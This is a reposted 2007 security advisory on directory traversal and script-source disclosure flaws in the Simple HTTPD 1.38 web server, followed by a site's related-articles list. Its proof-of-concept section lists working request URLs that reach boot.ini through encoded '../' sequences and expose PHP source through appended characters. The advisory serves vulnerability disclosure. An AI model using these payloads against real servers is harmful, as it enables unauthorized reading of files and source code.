Two vulnerabilities in Simple HTTPD 1.38

简介: #######################################################################                         ...
#######################################################################

                             Luigi Auriemma

Application:  Simple HTTPD
              http://shttpd.sourceforge.net
Versions:     <= 1.38
Platforms:    Windows, *nix, QNX, RTEMS
              only Windows seems vulnerable
Bugs:         A] directory traversal
              B] scripts and CGI viewing/downloading
                 (%20 char found by Shay priel in Jun 2007)
Exploitation: remote
Date:         07 Dec 2007
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Simple HTTPD (shttpd) is an open source web server created for embedded
systems.


#######################################################################

=======
2) Bugs
=======

----------------------
A] directory traversal
----------------------

Using the "../" pattern is possible to download any file in the disk on
which is located the web root directory.


--------------------------------------
B] scripts and CGI viewing/downloading
--------------------------------------

Any script or CGI in the server can be viewed/downloaded instead of
being executed simply appending the chars '+', '.', %20 (this one
reported by Shay priel in the summer 2007), %2e and any other byte (in
hex format too) major than 0x7f to the requested filename.


Note that only Windows seems vulnerable to the above bugs.


#######################################################################

===========
3) The Code
===========


A]
http://SERVER/../../../boot.ini
http://SERVER/../%2e%2e%5c../boot.ini

B]
http://SERVER/file.php+
http://SERVER/file.php.
http://SERVER/file.php%80
http://SERVER/file.php%ff


#######################################################################

======
4) Fix
======


I have posted the problems in the shttpd-general mailing-list but there
is no reply yet:

  http://sourceforge.net/mailarchive/forum.php?forum_name=shttpd-general


#######################################################################
 
目录
相关文章
|
Apache
解决apache启动错误&quot;httpd:Could not reliably determine
<p style="padding-top:0px; padding-bottom:0px; margin-top:0px; margin-bottom:0px; clear:both; height:auto; overflow:hidden; color:rgb(85,85,85); font-family:宋体,'Arial Narrow',arial,serif; line-hei
2256 0
|
应用服务中间件 nginx Unix
httpd: Could not reliably determine the server&#39;s fully qualified domain name
[root@luozhonghua sbin]# service httpd start Starting httpd: httpd: apr_sockaddr_info_get() failed for luozhonghua httpd: Could not reliably determine the server's fully qualified domain name, u
1539 0
|
SQL Go 关系型数据库
Multiple vulnerabilities in Cacti 0.8.8b and lower
The following are XSS and SQL Injection vulnerabilities I've found in the latest version of Cacti (0.
905 0
|
应用服务中间件 nginx
Emiller's Advanced Topics In Nginx Module Development
http://www.evanmiller.org/nginx-modules-guide-advanced.
720 0
|
SQL 安全 PHP
[waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
Author: Janek Vind "waraxe"Date: 25. April 2013Location: Estonia, TartuWeb: http://www.
718 0
|
Web App开发 PHP
ModSecurity and ModSecurity Core Rule Set Multipart Bypasses
During our research of web application firewall evasion issues, we uncovered a flaw in ModSecu...
1045 0
|
索引
Drupal 7.14 &lt;= Full Path Disclosure Vulnerability
################################################# Drupal 7.14
1095 0